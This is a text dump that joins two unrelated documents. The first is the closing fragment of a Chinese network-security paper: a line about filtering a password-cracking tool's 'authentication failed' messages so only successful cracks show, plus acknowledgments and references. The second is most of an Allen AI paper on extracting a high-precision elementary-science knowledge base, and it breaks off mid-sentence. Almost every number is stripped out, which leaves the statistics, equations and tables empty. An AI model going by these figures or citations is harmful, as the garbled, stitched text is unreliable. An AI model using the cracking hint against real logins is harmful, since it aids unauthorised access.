ignore:mesg='authentication failed.'" to ignore the attempt to crack the failure, and only display the successful crack. acknowledgment acknowledgment this project supported by the national natural science foundation of china(no. ) this project supported by the national natural science youth foundation of china (no. ) author: ma limei, associate professor, hebei normal university, dominican university of america visiting scholars, research field: cyber security, machine learning and artificial neural network correspondence author: zhao dongmei, professor, hebei normal university, research field: cyber security, machine learning, information technology references [ ] shen qingni, qingsi. operating system security design. beijing: machinery industry press, . [ ] yu chaohui, wang changzheng, zhao yicheng. practical treasure book of network security system protection and hacker attack and defense. beijing: china railway publishing house, . author. thesis title [d]. journal of tsinghua university, , ( ): - . [ ] evi nemeth, garth snyder, trent r. hein, ben whaley. unix and linux system administration handbook ( th edition) [ ] tianhe culture. hacker attack and defense from entry to proficiency (attack and defense and script programming). beijing: machinery industry press, . [ ] cao hanming. hacker attack and defense. nanjing: southeast university press, . [ ] jiang youxu, guo quanshui, ma juan, et al. classification and community characteristics of forest communities in china [m]. beijing: science press, . [ ] songhua luo jianzhen jiang yuexia. study on the security strategy of electronic document filing in the environment of government cloud [d]. zhejiang archives, . [ ] dong zhenliang. application of cryptographic algorithms and international standardization [d]. financial information center of the people's bank of china, . [ ] zhou yinqing, ouyang zichun. brief discussion on the implementation and management of information system security level protection evaluation [d]. digital communication world, . [ ] liang lixin and li jun. information security level protection evaluation based on virtualization [d]. police technology, [ ] ma limei, wang fangwei. computer network security and experimental course, tsinghua university press,isbn: [ ] ma limei,guo qing,zhang linwei ubuntu linux operating system and experimental course, tsinghua university press,isbn: domain-targeted, high precision knowledge extraction bhavana dalvi mishra niket tandon allen institute for artificial intelligence n northlake way suite , seattle, wa {bhavanad,nikett,peterc}@allenai.org peter clark abstract our goal is to construct a domain-targeted, high precision knowledge base (kb), contain- ing general (subject,predicate,object) state- ments about the world, in support of a down- stream question-answering (qa) application. despite recent advances in information extrac- tion (ie) techniques, no suitable resource for our task already exists; existing resources are either too noisy, too named-entity centric, or too incomplete, and typically have not been constructed with a clear scope or purpose. to address these, we have created a domain- targeted, high precision knowledge extraction pipeline, leveraging open ie, crowdsourcing, and a novel canonical schema learning algo- rithm (called casi), that produces high pre- cision knowledge targeted to a particular do- main - in our case, elementary science. to measure the kb’s coverage of the target do- main’s knowledge (its “comprehensiveness” with respect to science) we measure recall with respect to an independent corpus of do- main text, and show that our pipeline produces output with over % precision and % re- call with respect to that target, a substantially higher coverage of tuple-expressible science knowledge than other comparable resources. we have made the kb publicly available . introduction while there have been substantial advances in knowledge extraction techniques, the availability of high precision, general knowledge about the world, this kb named as “aristo tuple kb” is available for down- load at http://data.allenai.org/tuple-kb remains elusive. specifically, our goal is a large, high precision body of (subject,predicate,object) statements relevant to elementary science, to sup- port a downstream qa application task. although there are several impressive, existing resources that can contribute to our endeavor, e.g., nell (carlson et al., ), conceptnet (speer and havasi, ), wordnet (fellbaum, ), webchild (tandon et al., ), yago (suchanek et al., ), freebase (bollacker et al., ), and reverb- m (fader et al., ), their applicability is limited by both • limited coverage of general knowledge (e.g., freebase and nell primarily contain knowl- edge about named entities; wordnet uses only a few (< ) semantic relations) • low precision (e.g., many conceptnet asser- tions express idiosyncratic rather than general knowledge) our goal in this work is to create a domain-targeted knowledge extraction pipeline that can overcome these limitations and output a high precision kb of triples relevant to our end task. our approach leverages existing techniques of open information extraction (open ie) and crowdsourcing, along with a novel schema learning algorithm. there are three main contributions of this work. first, we present a high precision extraction pipeline able to extract (subject,predicate,object) tuples rele- vant to a domain with precision in excess of %. the input to the pipeline is a corpus, a sense- disambiguated domain vocabulary, and a small set of entity types. the pipeline uses a combination of text filtering, open ie, turker annotation on sam- ples, and precision prediction to generate its output. transactions of the association for computational linguistics, vol. , pp. – , . action editor: patrick pantel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. second, we present a novel canonical schema in- duction method (called casi) that identifies clus- ters of similar-meaning predicates, and maps them to the most appropriate general predicate that cap- tures that canonical meaning. open ie, used in the early part of our pipeline, generates triples con- taining a large number of predicates (expressed as verbs or verb phrases), but equivalences and gen- eralizations among them are not captured. syn- onym dictionaries, paraphrase databases, and verb taxonomies can help identify these relationships, but only partially so because the meaning of a verb often shifts as its subject and object vary, something that these resources do not explicitly model. to address this challenge, we have devel- oped a corpus-driven method that takes into account the subject and object of the verb, and thus can learn argument-specific mapping rules, e.g., the rule “(x:animal,found in,y:location) → (x:animal,live in,y:location)” states that if some animal is found in a location then it also means the animal lives in the location. note that ‘found in’ can have very dif- ferent meaning in the schema “(x:substance,found in,y:material). the result is a kb whose general predicates are more richly populated, still with high precision. finally, we contribute the science kb itself as a resource publicly available to the research commu- nity. to measure how “complete” the kb is with re- spect to the target domain (elementary science), we use an (independent) corpus of domain text to char- acterize the target science knowledge, and measure the kb’s recall at high (> %) precision over that corpus (its “comprehensiveness” with respect to sci- ence). this measure is similar to recall at the point p= % on the pr curve, except measured against a domain-specific sample of data that reflects the dis- tribution of the target domain knowledge. compre- hensiveness thus gives us an approximate notion of the completeness of the kb for (tuple-expressible) facts in our target domain, something that has been lacking in earlier kb construction research. we show that our kb has comprehensiveness (recall of domain facts at > % precision) of % with respect to science, a substantially higher coverage aristo tuple kb is available for download at http:// allenai.org/data/aristo-tuple-kb of tuple-expressible science knowledge than other comparable resources. we are making the kb pub- licly available. outline we discuss the related work in section . in sec- tion , we describe the domain-targeted pipeline, in- cluding how the domain is characterized to the al- gorithm and the sequence of filters and predictors used. in section , we describe how the relation- ships between predicates in the domain are identi- fied and the more general predicates further pop- ulated. finally in section , we evaluate our ap- proach, including evaluating its comprehensiveness (high-precision coverage of science knowledge). related work there has been substantial, recent progress in knowledge bases that (primarily) encode knowledge about named entities, including freebase (bol- lacker et al., ), knowledge vault (dong et al., ), dbpedia (auer et al., ), and others that hierarchically organize nouns and named entities, e.g., yago (suchanek et al., ). while these kbs are rich in facts about named entities, they are sparse in general knowledge about common nouns (e.g., that bears have fur). kbs covering general knowledge have received less attention, although there are some notable exceptions constructed using manual methods, e.g., wordnet (fellbaum, ), crowdsourcing, e.g., conceptnet (speer and havasi, ), and, more recently, using automated meth- ods, e.g., webchild (tandon et al., ). while useful, these resources have been constructed to tar- get only a small set of relations, providing only lim- ited coverage for a domain of interest. to overcome relation sparseness, the paradigm of open ie (banko et al., ; soderland et al., ) extracts knowledge from text using an open set of relationships, and has been used to success- fully build large-scale (arg ,relation,arg ) resources such as reverb- m (containing million general triples) (fader et al., ). although broad cov- erage, however, open ie techniques typically pro- duce noisy output. our extraction pipeline can be viewed as an extension of the open ie paradigm: we start with targeted open ie output, and then ap- ply a sequence of filters to substantially improve the figure : the extraction pipeline. a vocabulary-guided sequence of open information extraction, crowdsourcing, and learning predicate relationships are used to produce high precision tuples relevant to the domain of interest. output’s precision, and learn and apply relationships between predicates. the task of finding and exploiting relationships between different predicates requires identifying both equivalence between relations (e.g., clustering to find paraphrases), and implication (hierarchical organization of relations). one class of approach is to use existing resources, e.g., verb taxonomies, as a source of verbal relationships, e.g., (grycner and weikum, ), (grycner et al., ). how- ever, the hierarchical relationship between verbs, out of context, is often unclear, and some verbs, e.g., “have”, are ambiguous. to address this, we char- acterize semantic relationships not only by a verb but also by the types of its arguments. a sec- ond class of approach is to induce semantic equiva- lence from data, e.g., using algorithms such as dirt (lin and pantel, ), resolver (yates and et- zioni, ), wisenet (moro and navigli, ), and amie (galárraga et al., ). these allow relational equivalences to be inferred, but are also noisy. in our pipeline, we combine these two ap- proaches together, by clustering relations using a similarity measure computed from both existing re- sources and data. a novel feature of our approach is that we not only cluster the (typed) relations, but also identify a canonical relation that all the other relations in a cluster can be mapped to, without recourse to human annotated training data or a target relational vocab- ulary (e.g., from freebase). this makes our prob- lem setting different from that of universal schema (riedel et al., ) where the clusters of relations are not explicitly represented and mapping to canon- ical relations can be achieved given an existing kb like freebase. although no existing methods can be directly applied in our problem setting, the amie- based schema clustering method of (galárraga et al., ) can be modified to do this also. we have implemented this modification (called amie*, de- scribed in section . ), and we use it as a baseline to compare our schema clustering method (casi) against. finally, interactive methods have been used to create common sense knowledge bases, for ex- ample conceptnet (speer and havasi, ; liu and singh, ) includes a substantial amount of knowledge manually contributed by people through a web-based interface, and used in numerous ap- plications (faaborg and lieberman, ; dinakar et al., ). more recently there has been work on interactive methods (dalvi et al., ; wolfe et al., ; soderland et al., ), which can be seen as a “machine teaching” approach to kb con- struction. these approaches focus on human-in-the- loop methods to create domain specific knowledge bases. such approaches are proven to be effective on domains where expert human input is available. in contrast, our goal is to create extraction tech- niques that need little human supervision, and result in comprehensive coverage of the target domain. the extraction pipeline we first describe the overall extraction pipeline. the pipeline is a chain of filters and transformations, out- putting (subject,predicate,object) triples at the end. it uses a novel combination of familiar technologies, plus a novel schema learning module, described in more detail in section . . inputs and outputs unlike many prior efforts, our goal is a domain- focused kb. to specify the kb’s extent and focus, we use two inputs: . a domain vocabulary listing the nouns and verbs relevant to the domain. in our particular application, the domain is elementary science, and the domain vocabulary is the typical vocab- ulary of a fourth grader (∼ year old child), augmented with additional science terms from th grade science texts, comprising of about nouns, verbs, adjectives, and adverbs. . a small set of types for the nouns, listing the primary types of entity relevant to the domain. in our domain, we use a manually constructed inventory of types (animal, artifact, body part, measuring instrument, etc.). in addition, the pipeline also uses: . a large, searchable text corpus to provide sen- tences for knowledge extraction. in our case, we use the web via a search engine (bing), fol- lowed by filters to extract clean sentences from search results. . word senses although, in general, nouns are ambiguous, in a targeted domain there is typically a clear, primary sense that can be identified. for example, while in general the word “pig” can refer to an animal, a per- son, a mold, or a block of metal, in th grade sci- ence it universally refers to an animal . we leverage this for our task by assuming one sense per noun in the domain vocabulary, and notate these senses by manually assigning each noun to one of the entity types in the type inventory. verbs are more challenging, because even within a domain they are often polysemous out of con- text (e.g., “have”). to handle this, we refer to verbs along with their argument types, the com- bination expressed as a verbal schema, e.g., (ani- mal,“have”,bodypart). this allows us to distinguish there are exceptions, e.g., in th grade science “bat” can refer to either the animal or the sporting implement, but these cases are rare. different contextual uses of a verb without introduc- ing a proliferation of verb sense symbols. others have taken a similar approach of using type restric- tions to express verb semantics (pantel et al., ; del corro et al., ). . the pipeline the pipeline is sketched in figure and exemplified in table , and consists of six steps: . . sentence selection the first step is to construct a collection of (loosely) domain-appropriate sentences from the larger corpus. there are multiple ways this could be done, but in our case we found the most effective way was as follows: a. list the core topics in the domain of inter- est (science), here producing topics derived from syllabus guides. b. for each topic, author - query templates, pa- rameterized using one or more of the do- main types. for example, for the topic “animal adapation”, a template was “[animal] adapta- tion environment”, parameterized by the type animal. the purpose of query templates is to steer the search engine to domain-relevant text. c. for each template, automatically instantiate its type(s) in all possible ways using the domain vocabulary members of those types. d. use each instantiation as a search query over the corpus, and collect sentences in the top (here, ) documents retrieved. in our case, this resulted in a generally domain- relevant corpus of m sentences. . . tuple generation second, we run an open information extraction system over the sentences to generate an initial set of (np,vp,np) tuples. in our case, we use openie . (soderland et al., ; mausam et al., ). . . headword extraction and filtering third, the np arguments are replaced with their headwords, by applying a simple headword filtering utility. we discard tuples with infrequent vps or ver- bal schemas (here vp frequency < , schema fre- quency < ). pipeline example outputs: inputs: corpus + vocabulary + types . sentence selection: “in addition, green leaves have chlorophyll.”) . tuple generation: (“green leaves” “have” “chlorophyll”) . headword extraction: (“leaf” “have” “chlorophyll”) . refinement and scoring: (“leaf” “have” “chlorophyll”) @ . (score) . phrasal tuple generation: (“leaf” “have” “chlorophyll”) @ . (score) (“green leaf” “have” “chlorophyll”) @ . (score) . relation canonicalization: (“leaf” “have” “chlorophyll”) @ . (score) (“green leaf” “have” “chlorophyll”) @ . (score) (“leaf” “contain” “chlorophyll”) @ . (score) (“green leaf” “contain” “chlorophyll”) @ . (score) table : illustrative outputs of each step of the pipeline for the term “leaf”. . . refinement and scoring fourth, to improve precision, turkers are asked to manually score a proportion (in our case, %) of the tuples, then a model is constructed from this data to score the remainder. for the turk task, turkers were asked to label each tuple as true or false/nonsense. each tuple is labeled times, and a majority vote is applied to yield the overall label. the semantics we apply to tuples (and which we ex- plain to turkers) is one of plausibility: if the fact is true for some of the arg ’s, then score it as true. for example, if it is true that some birds lay eggs, then the tuple (bird, lay, egg) should be marked true. the degree of manual vs. automated can be selected here depending on the precision/cost constraints of the end application. we then build a model using this data to predict scores on other tuples. for this model, we use lo- gistic regression applied to a set of tuple features. these tuple features include normalized count fea- tures, schema and type level features, pmi statis- tics and semantic features. normalized count fea- tures are based on the number of occurrences of tu- ples, and the number of unique sentences the tuple is extracted from. schema and type level features are derived from the subject and object type, and frequency of schema in the corpus. semantic fea- tures are based on whether subject and object are ab- stract vs. concrete (using turney et al’s abstractness database (turney et al., )), and whether there are any modal verbs (e.g. may, should etc.) in the original sentence. pmi features are derived from the count statistics of subject, predicate, object and en- tire triple in the google n-gram corpus (brants and franz, ). . . phrasal tuple generation fifth, for each headword tuple (n,vp,n), retrieve the original phrasal triples (np,vp,np) it was de- rived from, and add sub-phrase versions of these phrasal tuples to the kb. for example, if a headword tuple (cat, chase, mouse) was derived from (a black furry cat, chased, a grey mouse) then the algorithm considers adding (black cat, chase, mouse) (black furry cat, chase, mouse) (black cat, chase, grey mouse) (black furry cat, chase, grey mouse) valid noun phrases are those following a pattern “<adj>* <noun>+”. the system only retains constructed phrasal tuples for which both subject and object phrases satisfy pmi and count thresh- olds , computed using the google n-gram corpus (brants and franz, ). in general, if the head- word tuple is scored as correct and the pmi and count thresholds are met, then the phrasal originals and variants are also correct. (we evaluate this in section . ). . . canonical schema induction finally, we induce a set of schema mapping rules over the tuples that identify clusters of equivalent and similar relations, and map them to a canonical, generalized relation. these canonical, generalized relations are referred to as canonical schemas, and the induction algorithm is called casi (canonical schema induction). the rules are then applied to the tuples, resulting in additional general tuples be- ing added to the kb. the importance of this step is that generalizations among seemingly disparate tu- ples are made explicit. while we could then discard e.g., “black bear” is a usable phrase provided it occurs > k times in the n-gram corpus and log[p(“black bear”)/p(“black”).p(“bear”)] > k in the n-gram corpus, where constants k and k were chosen to optimize performance on a small test set. tuples that are mapped to a generalized form, we in- stead retain them in case a query is made to the kb that requires the original fine-grained distinctions. in the next section, we describe how these schema mapping rules are learned. canonical schema induction (casi) . task: induce schema mapping rules the role of the schema mapping rules is to make generalizations among seemingly disparate tuples explicit in the kb. to do this, the system identi- fies clusters of relations with similar meaning, and maps them to a canonical, generalized relation. the mappings are expressed using a set of schema map- ping rules, and the rules can be applied to infer ad- ditional, general triples in the kb. informally, map- ping rules should combine evidence from both ex- ternal resources (e.g., verb taxonomies) and data (tuples in the kb). this observation allows us to formally define an objective function to guide the search for mapping rules. we define: • a schema is a structure (type ,verb phrase,type ) here the types are from the input type inventory. • a schema mapping rule is a rule of the form schemai → schemaj stating that a triple using schemai can be re- expressed using schemaj. • a canonical schema is a schema that does not occur on the left-hand side of any mapping rule, i.e., it does not point to any other schema. to learn a set of schema mapping rules, we select from the space of possible mapping rules so as to: • maximize the quality of the selected mapping rules, i.e., maximize the evidence that the se- lected rules express valid paraphrases or gen- eralization. that is we are looking for synony- mous and type-of edges between schemas. this evidence is drawn from both existing resources (e.g., wordnet) and from statistical evidence (among the tuples themselves). • satisfy the constraint that every schema points to a canonical schema, or is itself a canonical schema. we can view this task as a subgraph selection prob- lem in which the nodes are schemas, and directed edges are possible mapping rules between schemas. the learning task is to select subgraphs such that all nodes in a subgraph are similar, and point to a sin- gle, canonical node (figure ). we refer to the blue nodes in figure as induced canonical schemas. to solve this selection problem, we formulate it as as a linear optimization task and solve it using inte- ger linear programming (ilp), as we now describe. figure : learning schema mapping rules can be viewed as a subgraph selection problem, whose result (illus- trated) is a set of clusters of similar schemas, all pointing to a single, canonical form. . features for learning schema mapping rules to assess the quality of candidate mapping rules, we combine features from the following sources: moby, wordnet, association rules and statistical features from our corpus. these features indicate synonymy or type-of links between schemas. for each schema si e.g. (animal, live in, location) we define the re- lation ri as being the verb phrase (e.g. “live in”), and vi as the root verb of ri (e.g. “live”). • moby: we also use verb phrase similarity scores derived from the moby thesaurus. moby score mij for a schema pair is computed by a lookup in this dataset for relation pair ri, rj or root verb pair vi, vj. this is also a directed fea- ture, i.e. mij = mji. • wordnet: if there exists a troponym link path from schema ri to rj, then we define the word- net score wij for this schema pair as the in- verse of the number of edges that need to be type use which parts of schema? what kind of relations do they encode? feature source semantic distributional subject predicate object synonym type-of temporal implication moby x x x x wordnet x x x amie-typed x x x x x x amie-untyped x x x x x x table : the different features used in relation canonicalization capture different aspects of similarity. maximize {xij} ∑ i,j xij ( λ ∗mij + λ ∗wij+λ ∗atij +λ ∗auij+λ ∗sij ) −δ ∗‖x‖ subject to, xij ∈{ , }, ∀〈i,j〉 xij are boolean. xij + xji ≤ , ∀i,j schema mapping relation is asymmetric. ∑ j xij ≤ , ∀i select at most one parent per schema. xij + xjk −xik ≤ , ∀〈i,j,k〉 schema mapping relation is transitive. ( ) figure : the ilp used for canonical schema induction traveled to reach rj from ri. if such a path does not exist, then we look for a path from vi to vj. since we do not know the exact word- net synset applicable for each schema, we con- sider all possible synset choices and pick the best score as wij. this is a directed feature i.e., wij = wji. note that even though word- net is a high quality resource, it is not com- pletely sufficient for our purposes. out of unique relations (verb phrases) in our kb, only ( %) are present in wordnet. we can deal with these out of wordnet verb phrases by re- lying on other sets of features described next. • amie: amie is an association rule min- ing system that can produce association rules of the form: “?a eat ?b → ?a consume ?b”. we have two sets of amie fea- tures: typed and untyped. untyped features are of the form ri → rj, e.g., eat → consume, whereas typed features are of the form si → sj, e.g., (animal,eat,food) → (animal,consume,food). amie produces real valued scores between to for each rule. we define auij and atij as untyped and typed amie rule scores respectively. we use pca confidence scores produced by amie. • specificity: we define specificity of each re- lation as its idf score in terms of the number of argument pairs it occurs with, compared to total number of argument type pairs in the cor- pus. the specificity score of a schema mapping rule favors more general predicates on the par- ent side of the rules. specificity(r) = idf(r) sp(r) = specificity(r) maxr′ specificity(r ′) sij = sp(ri)−sp(rj) further, we have a small set of very generic re- lations like “have” and “be” that are considered as relation stopwords by setting their sp(r) scores to . these features encode different aspects of simi- larity between schemas as described in table . in this work we combine semantic high-quality fea- tures from wordnet, moby thesaurus with weak dis- tributional similarity features from amie to gener- ate schema mapping rules. we have observed that thesaurus features are very effective for predicates which are less ambiguous e.g. eat, consume, live in. association rule features on the other hand have ev- idence for predicates which are very ambiguous e.g. have, be. thus these features are complementary. further, these features indicate different kinds of relations between two schemas: synonymy, type- of and temporal implication (refer table ). in this work, we want to learn the schema mapping rules that capture synonymy and type-of relations and discard the temporal implications. this makes our problem setting different from that of knowl- edge base completion methods e.g., (socher et al., ). our proposed method casi uses an ensem- ble of semantic and statistical features enabling us to promote the synonymy and type-of edges, and to select the most general schema as canonical schema per cluster. . ilp model used in casi the features described in section . provide par- tial support for possible schema mapping rules in our dataset. the final set of rules we select needs to comply with asymmetry, transitive closure and at most one parent per schema constraints. we use an integer linear program to find the optimal set of schema mapping rules that satisfy these constraints, shown formally in figure . we decompose the schema mapping problem into multiple independent sub-problems by considering schemas related to a pair of argument types, e.g, all schemas that have domain or range types an- imal, location would be considered as a separate sub-problem. this way we can scale our method to large sets of schemas. the ilp for each sub-problem is presented in equation . in equation , each xij is a boolean variable representing whether we pick the schema mapping rule si → sj. as described in section . , mij,wij,atij,auij,sij represent the scores pro- duced by moby, wordnet, amie-typed, amie- untyped and specificity features respectively for the schema mapping rule si → sj. the objective func- tion maximizes the weighted combination of these scores. further, the solution picked by this ilp sat- isfies constraints such as asymmetry, transitive clo- sure and at most one parent per schema. we also apply an l sparsity penalty on x, retaining only those schema mapping edges for which the model is reasonably confident. for n schemas, there are o(n ) transitivity con- straints which make the ilp very inefficient. berant et al. ( ) proposed two approximations to handle a large number of transitivity rules by decomposing the ilp or solving it in an incremental way. instead we re-write the ilp rules in such a way that we can efficiently solve our mapping problem without intro- ducing any approximations. the last two constraints of this ilp can be rewritten as follows: (∑ j xij ≤ ,∀i and xij + xjk −xik ≤ , ∀〈i,j,k〉 ) =⇒ if(xij = ) then xjk = ∀k this results in o(n ) constraints and makes the ilp efficient. impact of this technique in terms of run- time is described in section . . we then use an off-the-shelf ilp optimization en- gine called scpsolver (planatscher and schober, ) to solve the ilp problems. the output of our ilp model is the schema mapping rules. we then apply these rules onto kb tuples to generate addi- tional, general tuples. some examples of the learned rules are: (organism, have, phenomenon) → (organism, undergo, phenomenon) (animal, have, event) → (animal, experience, event) (bird, occupy, location) → (bird, inhabit, location) evaluation . kb comprehensiveness our overall goal is a high-precision kb that has rea- sonably “comprehensive” coverage of facts in the target domain, on the grounds that these are the facts that a domain application is likely to query about. this notion of kb comprehensiveness is an impor- tant but under-discussed aspect of knowledge bases. for example, in the automatic kb construction lit- erature, while a kb’s size is often reported, this does not reveal whether the kb is near-complete or merely a drop in the ocean of that required (razniewski et al., ; stanovsky and dagan, ). more formally, we define comprehensive- ness as: recall at high (> %) precision of domain- relevant facts. this measure is similar to recall at the point p= % on the pr curve, except recall is mea- sured with respect to a different distribution of facts (namely facts about elementary science) rather than a held-out sample of data used to build the kb. the particular target precision value is not critical; what kb precision coverage of tuple-expressible kb comprehensiveness w.r.t. science domain science knowledge (science recall @ % precision) (recall on science kb) webchild % . % . % nell % . % . % conceptnet % . % n/a (p< %) reverb- m % . % n/a (p< %) our kb % . % . % table : precision and coverage of tuple-expressible elementary science knowledge by existing resources vs. our kb. precision estimates are within +/- % with % confidence interval. is important is that the same precision point is used when comparing results. we choose % as subjec- tively reasonable; at least out of queries to the kb should be answered correctly. there are several ways this target distribution of required facts can be modeled. to fully realize the ambition of this metric, we would directly identify a sample of required end-task facts, e.g., by man- ual analysis of questions posed to the end-task sys- tem, or from logs of the interaction between the end- task system and the kb. however, given the practi- cal challenges of doing this at scale, we take a sim- pler approach and approximate this end-task distri- bution using facts extracted from an (independent) domain-specific text corpus (we call this a reference corpus). note that these facts are only a sample of domain-relevant facts, not the entirety. otherwise, we could simply run our extractor over the refer- ence corpus and have all we need. now we are in a strong position, because the reference corpus gives us a fixed point of reference to measure comprehen- siveness: we can sample facts from it and measure what fraction the kb “knows”, i.e., can answer as true (figure ). for our specific task of elementary science qa, we have assembled a reference corpus of ∼ . m sentences comprising of multiple elementary sci- ence textbooks, multiple dictionary definitions of all fourth grade vocabulary words, and simple wikipedia pages for all fourth grade vocabulary words (where such pages exist). to measure our kb’s comprehensiveness (of facts within the ex- pressive power of our kb), we randomly sampled facts, expressed as headword tuples, from this corpus named as “aristo mini corpus” is avail- able for download at http://allenai.org/data/ aristo-tuple-kb figure : comprehensiveness (frequency-weighted cov- erage c of the required facts d) can be estimated using coverage a of a reference kb b as a surrogate sampling of the target distribution. the reference corpus. these were generated semi- automatically using parts of our pipeline, namely in- formation extraction then turker scoring to obtain true facts . we call these facts the reference kb . to the extent our tuple kb contains facts in this reference kb (and under the simplifying assump- tion that these facts are representative of the sci- ence knowledge our qa application needs), we say our tuple kb is comprehensive. doing this yields a value of % comprehensiveness for our kb (ta- ble ). we also measured the precision and science cov- erage of other, existing fact kbs. for precision, we took a random sample of facts in each kb, and followed the same methodology as earlier so that the this method will of course miss many facts in the reference corpus, e.g., when extraction fails or when the fact is in a non- sentential form, e.g., a table. however, we only assume that the distribution of extracted facts is representative of the domain. these test facts are published with the dataset at http://allenai.org/data/aristo-tuple-kb comparison is valid: turkers label each fact as true or false/nonsense, each fact is labeled times, and the majority label is the overall label. the preci- sions are shown in table . for conceptnet, we used only the subset of facts with frequency > , as frequency= facts are particularly noisy (thus the precision of the full conceptnet would be lower). we also computed the science coverage (= com- prehensiveness, if p> %) using our reference kb. note that these other kbs were not designed with elementary science in mind and so, not surprisingly, they do not cover many of the relations in our do- main. to make the comparison as fair as possible, given these other kbs use different relational vocab- ularies, we first constructed a list of very general relations (similar to the conceptnet relations, e.g., causes, uses, part-of, requires), and then mapped re- lations used in both our reference facts, and in the other kbs, to these relations. to compare if a reference fact is in one of these other kbs, only the general relations need to match, and only the subject and object headwords need to match. this allows substantial linguistic variation to be permitted dur- ing evaluation (e.g., “contain”,. “comprise”, “part of” etc. would all be considered matching). in other words, this is a generous notion of “a kb containing a fact”, in order to be as fair as possible. as table illustrates, these other kbs cover very little of the target science knowledge. in the case of webchild and nell, the primary reason for low recall is low overlap between their target and ours. nell has almost no predicate overlap with our ref- erence kb, reflecting it’s named entity centric con- tent. webchild is rich in part-of and location in- formation, and covers % of part-of and location facts in our reference kb. however, these are only . % of all the facts in the reference kb, resulting in an overall recall (and comprehensiveness) of %. in contrast, conceptnet and reverb- m have sub- stantially more relational overlap with our reference kb, hence their recall numbers are higher. however, both have lower precision, limiting their utility. this evaluation demonstrates the limited science coverage of existing resources, and the degree to which we have overcome this limitation. the extrac- tion methods used to build these resources are not directly comparable since they are starting with dif- ferent input/output settings and involve significantly different degrees of supervision. rather, the results suggest that general-purpose kbs (e.g., nell) may have limited coverage for specific domains, and that our domain-targeted extraction pipeline can signifi- cantly alleviate this in terms of precision and cover- age when that domain is known. extraction stage #schemas #tuples % avg. output precision . tuple generation - . m . . headword tuples . k k . . tuple scoring . k k . . phrasal tuples . k k . . canonical schemas . k k . table : evaluation of kb at different stages of extrac- tion. precision estimates are within +/- % with % con- fidence interval. . performance of the extraction pipeline in addition, we measured the average precision of facts present in the kb after every stage of the pipeline (table ). we can see that the pipeline take as input . m openie tuples with precision of % and produces a good quality science kb of over k facts with . % precision organized into k schemas. the table also shows that precision is largely preserved as we introduce phrasal triples and general tuples. . evaluation of canonical schema induction in this section we will focus on usefulness and cor- rectness of our canonical schema induction method. the parameters of the ilp model (see equation ) i.e., λ . . .λ and δ are tuned based on sample accu- racy of individual feature sources and using a small schema mapping problem with schemas applicable to vocabulary types animal and body-part. λ = . , λ = . , λ = . , λ = . , λ = . , δ = . further, with o(n ) transitivity constraints we could not successfully solve a single ilp problem with schemas within a time limit of hour. whereas, when we rewrite them with o(n ) con- straints as explained in section . , we could solve ilp sub-problems within minutes with aver- age runtime per ilp being msec. canonical schema induction method comprehensiveness none . % amie* . % casi (our method) . % table : use of the casi-induced schemas significantly (at the % confidence level) improves comprehensive- ness of the kb. as discussed in section , we not only cluster the (typed) relations, but also identify a canoni- cal relation that all the other relations in a cluster can be mapped to, without recourse to human an- notated training data or a target relational vocab- ulary. although no existing methods do this di- rectly, the amie-based schema clustering method of (galárraga et al., ) can be extended to do this by incorporating the association rules learned by amie (both typed and untyped) inside our ilp framework to output schema mapping rules. we call this exten- sion amie*, and use it as a baseline to compare the performance of casi against. . . canonical schema usefulness the purpose of canonicalization is to allow equiv- alence between seemingly different schema to be recognized. for example, the kb query (“polar bear”, “reside in”, “tundra”)? can be answered by a kb triple (“polar bear”, “inhabit”, “tundra”) if schema mapping rules map one or both to the same canonical form e.g., (“polar bear”, “live in”, “tun- dra”) using the rules: (animal, inhabit, location) → (animal, live in, location) (animal, reside in, location) → (animal, live in, location) one way to quantitatively evaluate this is to mea- sure the impact of schema mapping on the com- prehensiveness metric. table shows that, before applying any canonical schema induction method, the comprehensiveness score of our kb was %. the amie* method improves this score to . %, whereas our method achieves a comprehensiveness of . %. this latter improvement over the original kb is statistically significant at the % confidence e.g., posed by a qa system trying to answer the question “which is the likely location in which a polar bear to reside in? (a) tundra (b) desert (c) grassland” level (sample size is the facts sampled from the reference corpus). . . canonical schema correctness a second metric of interest is the correctness of the schema mapping rules (just because comprehen- siveness improves does not imply every mapping rule is correct). we evaluate correctness of schema mapping rules using following metric: precision of schema mapping rules: we asked turkers to directly assess whether particular schema mapping rules were correct, for a random sample of rules. to make the task clear, turkers were shown the schema mapping rule (expressed in en- glish) along with an example fact that was rewrit- ten using that rule (to give a concrete example of its use), and they were asked to select one option “correct or incorrect or unsure” for each rewrite rule. we asked this question to three different turkers and considered the majority vote as final evaluation . the comparison results are shown in table . starting with . k schemas, amie* canonicalized only of those into canonical schemas (using schema mapping rules). in contrast, our method casi canonicalized . k schemas into . k canon- ical schemas. we randomly sampled schema mapping rules generated by each method and asked turkers to evaluate their correctness, as described earlier. as shown in table , the precision of rules produced was casi is %, compared with amie* which achieved % on this metric. thus casi could canonicalize five times more schemas with % more precision. . discussion and future work next, we identify some of the limitations of our ap- proach and directions for future work. . extracting richer representations of knowl- edge: while triples can capture certain kinds of knowledge, there are other kinds of information, e.g. detailed descriptions of events or processes, that cannot be easily represented by a set of independent tuples. an extension of this work would be to extract event frames, capable of representing a richer set of we discarded the unsure votes. for more than % of the rules, at least out of turkers reached clear consensus on whether the rule is “correct vs. incorrect”, indicating that the turker task was clearly defined. canonical schema #input #schema #induced precision of induction method schemas mapping rules canonical schemas schema mapping rules amie* . k % casi (our method) . k . k . k % table : casi canonicalizes five times more schemas than amie*, and also achieves a small ( %) increase in preci- sion, demonstrating how additional knowledge resources can help the canonicalization process (section . ). precision estimates are within +/- % with % confidence interval. roles in a wider context compared to a triple fact. for example in the news domain, while representing an event “public shooting”, one would like to store the shooter, victims, weapon used, date, time, loca- tion and so on. building high-precision extraction techniques that can go beyond binary relations to- wards event frames is a potential direction of future research. . richer kb organization: our approach or- ganizes entities and relations into flat entity types and schema clusters. an immediate direction for ex- tending this work could be a better kb organization with deep semantic hierarchies for predicates and ar- guments, allowing inheritance of knowledge among entities and triples. . improving comprehensiveness beyond %: our comprehensiveness score is currently at % in- dicating % of potentially useful science facts are still missing from our kb. there are multiple ways to improve this coverage including but not limited to ) processing more science corpora through our extraction pipeline, ) running standard kb com- pletion methods on our kb to add the facts that are likely to be true given the existing facts, and ) im- proving our canonical schema induction method fur- ther to avoid cases where the query fact is present in our kb but with a slight linguistic variation. . quantification sharpening: similar to other kbs, our tuples have the semantics of plausibility: if the fact is generally true for some of the arg s, then score it as true. although frequency filtering typically removes facts that are rarely true for the arg s, there is still variation in the quantifier strength of facts (i.e., does the fact hold for 